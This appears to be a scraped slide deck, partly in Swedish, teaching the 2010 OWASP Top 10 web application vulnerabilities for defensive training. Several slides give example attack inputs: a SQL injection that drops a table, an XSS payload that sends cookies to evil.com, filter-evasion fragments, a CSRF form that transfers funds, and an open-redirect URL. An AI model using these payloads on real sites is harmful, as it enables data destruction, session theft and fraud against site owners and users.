190 likes | 389 Views
OWASP top 10 - Agenda. Background Risk based Top 10 items 1 – 6 Live demo Top 10 items 7 – 10 OWASP resources . The OWASP Guide. Warning . Risk analysis Insiders Architecture Modular Clarity SDLC Knowledge Predictability . Top 10 - 2010. Injection
E N D
OWASP top 10 - Agenda Background Risk based Top 10 items 1 – 6 Live demo Top 10 items 7 – 10 OWASP resources
Warning • Risk analysis • Insiders • Architecture • Modular • Clarity • SDLC • Knowledge • Predictability
Top 10 - 2010 • Injection • Cross site scripting (XSS) • Broken authentication and session management • Insecure direct object reference • Cross site request forgery (CSRF) • Security missconfiguration • Insecure cryptograpic storage • Failure to restrict URL access • Insufficient transoport layer protection • Unvalidated redirects and forwards
A1 – Injection Client Appl DB Shell Pgm CPU
A1 – Injection String query = "SELECT * FROM accnts WHERE ID='" + request.getParameter("id") +"'"; id="foo" SELECT * FROM accnts WHERE ID='foo'; id="foo';DROP accnts;--" SELECT * FROM accnts WHERE ID='foo';DROP accnts;--';
A2 - Cross site scripting (XSS) Browser Appl DB Browser
A2 - Cross site scripting (XSS) (String) page += "<input name='cc' type='TEXT' value='" + request.getParameter("CC") + "'>"; CC=“123456789" <input name='cc' value='123456789'> CC=123456789"><script>window.location=http://evil.com?x=document.cookie</script> <input name='cc' value='123456789“><script> window.location=http://evil.com?x=document.cookie </script>'>
A2 - Cross site scripting (XSS) <%3C<<<<<<< <<�\x3c\x3C\u003c\u003C <img src=http://site.com onmoseover= <body onload= <IMG SRC=jAvascript:alert('test2')>
A3 - Broken authentication and session mngmnt • Unpredictable passwords, sessions-ID, security-questions • No sessions-id/credentials i URL • Avoid session-fixation • Time out of sessions & logout buttons • Different sessions id outside/inside TLS • No clear text passwords
A4 - Insecure direct object references <SELECT name=period> <OPTION>2010q1</OPTION> <OPTION>2011q2</OPTION> </SELECT> period=2011q2 period=2011q3
A5 - Cross-site request forgery (CSRF) <img src="http://example.com/transferFunds?amount=1500 &destinationAccount=attackersAcct#“width="0" height="0" /> <body onload="document.forms[0].submit()"> <form method="POST" action="https://bank.com/fn"> <input type="hidden" name="sp" value="8109"/> </form>
A6 - Security missconfiguration • Patching • OS • Application • Frameworks / libraries • Disable unnecessary services • Stack traces • Configuration
A7 - Insecure cryptographig storage • Keep track on sensitive data • Password one-way-hashed & salted • Password/Key management • TLS key pass phrase • M2M lösenord (obfuscation)
A8 - Failure to restrict URL access /user/getAccounts /admin/getAccounts
A9 - Insufficient transport layer protection • Use SSL/TLS • No mixed content • Use secure cookies • Example FireSheep exploits poor solutions
A10 - Unvalidated redirects and forwards • http://www.vuln.com/redir.asp?=http://www.links.com • http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D
OWASP resurser • OWASP Secure Software Contract Annex • OWASP Developer’s Guide • OWASP Enterprise Security API (ESAPI) • OWASP Software Assurance Maturity Model (SAMM) • OWASP WebGoat